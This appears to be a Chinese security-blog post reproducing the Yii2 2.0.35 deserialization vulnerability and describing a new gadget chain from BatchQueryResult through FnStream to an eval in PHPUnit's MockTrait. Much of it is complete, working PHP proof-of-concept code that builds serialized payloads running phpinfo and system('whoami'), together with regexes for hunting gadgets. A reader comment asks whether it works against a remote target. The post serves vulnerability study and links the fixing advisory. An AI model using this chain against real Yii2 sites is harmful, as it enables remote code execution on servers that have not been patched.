Yii这个反序列化修复,不能是针对攻击链去修复,而要根据自身业务需求,在反序列化的函数中,传递第二个参数,可以指定反序列化的对象或数组等。
Yii反序列化漏洞复现到新利用链发现
我是刚入门不久的小白, 如果有什么地方不对,请师父们及时指正. 本文参考奶权师傅的 Yii复现文章: 受益匪浅,自己调试的时候发现了一个新的利用链,于是来分享下
前言
我是刚入门不久的小白, 如果有什么地方不对,请师父们及时指正. 本文参考奶权师傅的 Yii复现文章: https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA 受益匪浅,自己调试的时候发现了一个新的利用链,于是来分享下
开始
反序列化漏洞影响到 2.0.38 被修复 https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj
Hello World
由于挖洞的时候遇到一个 cms 是 Yii2.0.35 的所以我选择复现Yii2.0.35: https://github.com/yiisoft/yii2/releases/tag/2.0.35, 跟着文档把 Hello World 写出来. 大概了解一下开发流程.
环境我用:phpstudy 集成环境. apache2.4.39 + php 7.4.3 + phpstorm 开启 xdebug;
如下,我创建了一个action:http://127.0.0.1/yii2.0.35/web/index.php?r=test/index, controllers的命名是 名称Controller,action的命名是: action名称
/views/test/index.php. 其中test是控制器(controller)的名称。 index 是 render 中的view 参数命名的
页面效果,
小技巧
在开始追踪利用连前, 提供一些小技巧, 另外我喜欢用 Vscode 来匹配内容(因为 Vscode 点击相应的搜索结果可以快速的定位到, 方便查看), 用 phpstorm 跟踪函数
正则匹配可控的方法
->\$([a-zA-Z0-9_-]+)\(
正则匹配可控的传入参数
[^if ][^foreach ][^while ]\(\$([a-zA-Z0-9_-]+)->
反序列化利用链
全局搜索 __destruct (反序列化后, 销毁对象时会触发的函数), 定位到 <u>vendor/yiisoft/yii2/db/BatchQueryResult.php</u>, 给 this->reset();
public function __destruct()
{
// make sure cursor is closed
$this->reset();
}
跟踪 restet 方法, 反序列化时, 反序列化的对象成员属性也是可控的. 所以 $this->_dataReader 可控, 可以进入 close 方法.
public function reset()
{
if ($this->_dataReader !== null) {
$this->_dataReader->close();
}
$this->_dataReader = null;
$this->_batch = null;
$this->_value = null;
$this->_key = null;
}
那么这里就形成了一个跳板. 全局找 close() 方法. 最后在 <u>/vendor/guzzlehttp/psr7/src/FnStream.php</u> 中找到一个非常危险的 close 方法, 该方法接收一个参数, 是可控的成员属性.
public function close()
{
return call_user_func($this->_fn_close);
}
POC 编写.
先提供一个反序列化的点. 修改 TestController 不要 render. 直接 var_dump unserialize;
class TestController extends Controller {
public function actionIndex($message="Hello") {
var_dump(unserialize($message));
// return $this->render("index", ['message'=>$message]);
}
}
对于 poc 的编写, 需要注意命名空间. 否则无法定位到相应的类. 也因为他会自动定位到相应的类,所以不用像原本定义一样继承相应的父类.
<u>vendor/yiisoft/yii2/db/BatchQueryResult.php</u>
namespace yii\db;
class BatchQueryResult {
// 需要控制的成员属性
private $_dataReader;
}
<u>vendor/guzzlehttp/psr7/src/FnStream.php</u>
namespace GuzzleHttp\Psr7;
class FnStream implements StreamInterface {
// 需要控制的参数, 原本并没有定义所以无要求
var $_fn_close;
}
poc 如下
<?php
namespace GuzzleHttp\Psr7 {
class FnStream {
var $_fn_close = "phpinfo";
}
}
namespace yii\db {
use GuzzleHttp\Psr7\FnStream;
class BatchQueryResult {
// 需要控制的成员属性
private $_dataReader;
public function __construct() {
$this->_dataReader = new FnStream();
}
}
$b = new BatchQueryResult();
var_dump(serialize($b));
}
执行成功.
危害放大
可以注意到, FnStream 类中的 call_user_func 只有一个参数. 翻一翻官方文档,发现了相应的解决方法. 所以遇到阻塞时,多翻翻手册也许会柳暗花明
如果要放大危害,这里只能作为跳板,还需要一个类. 全局搜索各危险函数. 寻找参数可控的方法.
在 <u>vendor\phpunit\phpunit\src\Framework\MockObject\MockTrait.php</u> 中找到了相应的方法
public function generate(): string
{
if (!\class_exists($this->mockName, false)) {
eval($this->classCode);
}
return $this->mockName;
}
修改 poc
<?php
namespace PHPUnit\Framework\MockObject{
class MockTrait {
private $classCode = "system('whoami');";
private $mockName = "anything";
}
}
namespace GuzzleHttp\Psr7 {
use PHPUnit\Framework\MockObject\MockTrait;
class FnStream {
var $_fn_close;
function __construct() {
$this->_fn_close = array(
new MockTrait(),
'generate'
);
}
}
}
namespace yii\db {
use GuzzleHttp\Psr7\FnStream;
class BatchQueryResult {
// 需要控制的成员属性
private $_dataReader;
function __construct() {
$this->_dataReader = new FnStream();
}
}
$b = new BatchQueryResult();
file_put_contents("poc.txt", serialize($b));
}
再次尝试, 报错了!!!这是修复了吗??,低版本也?
但是 phpinfo() 可以正常执行. 当我再回去看的时候. 我发现我漏掉了最底下的报错信息!!!。
先将 poc 复原到 phpinfo(); 可以看到虽然 throw 了, 但 phpinfo 正常执行. 不清楚是什么原因。我的猜想是: phpinfo 回显内容过大触发了分段传输. 我会继续研究这个问题.
利用这个方法. 修改一下 poc,加上phpifnfo();
最终 poc
<?php
namespace PHPUnit\Framework\MockObject{
class MockTrait {
private $classCode = "system('whoami');phpinfo();";
private $mockName = "anything";
}
}
namespace GuzzleHttp\Psr7 {
use PHPUnit\Framework\MockObject\MockTrait;
class FnStream {
var $_fn_close;
function __construct() {
$this->_fn_close = array(
new MockTrait(),
'generate'
);
}
}
}
namespace yii\db {
use GuzzleHttp\Psr7\FnStream;
class BatchQueryResult {
// 需要控制的成员属性
private $_dataReader;
function __construct() {
$this->_dataReader = new FnStream();
}
}
$b = new BatchQueryResult();
file_put_contents("poc.txt", serialize($b));
}
整理一下反序列化链
- 发表于 2021-04-07 22:01:32
- 阅读 ( 9915 )
- 分类:漏洞分析
2 条评论
浩南
2021-04-09 11:44
aiongw
2022-04-04 01:29
你好!如果不是本地搭建的!针对目标URL 可否利用
带头大哥
50 篇文章